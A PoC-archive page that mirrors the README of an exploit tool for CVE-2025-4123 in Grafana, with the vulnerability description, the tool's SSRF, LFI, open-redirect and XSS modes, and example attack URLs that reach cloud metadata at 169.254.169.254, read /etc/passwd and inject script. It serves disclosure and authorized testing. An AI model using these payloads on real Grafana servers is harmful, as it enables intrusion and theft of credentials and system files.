Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-4123 PoC — Grafana 安全漏洞

Source
https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
Associated Vulnerability
Title:Grafana 安全漏洞 (CVE-2025-4123)
Description:A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
Description
CVE-2025-4123 - Grafana Tool
Readme

# CVE-2025-4123 - Grafana Path Traversal Exploit

> Developed by **mitsec**

This is a proof-of-concept (PoC) exploit tool for **CVE-2025-4123**, a critical path traversal vulnerability in Grafana's `/public` endpoint. The exploit allows for:

- ✅ Server-Side Request Forgery (SSRF)
- ✅ Local File Inclusion (LFI)
- ✅ Open Redirect
- ✅ Cross-Site Scripting (XSS)

## 🔥 Affected

Grafana instances with `/public/` endpoint improperly handling encoded paths like:
```
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
```

---

## 🚀 Usage

```bash
python3 cve_2025_4123_exploit_mitsec_final.py
```

Then select the desired mode:

1. SSRF - Internal services like `169.254.169.254`
2. LFI  - Read files like `/etc/passwd`
3. Open Redirect - Redirect to external domains
4. XSS - JavaScript injection in public path

---

## 🧪 Example

```bash
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
```

---

## 📄 Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use against systems without consent is illegal.

---

## ✍️ Author

- [mitsec](https://github.com/ynsmroztas)
File Snapshot

 [4.0K]  /data/pocs/39fe7a34d6c48fd2bf548dd5cea1e20676075445
├── [2.8K]  cve_2025_4123_exploit-mitsec.py
├── [274K]  Grafana.jpg
└── [1.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →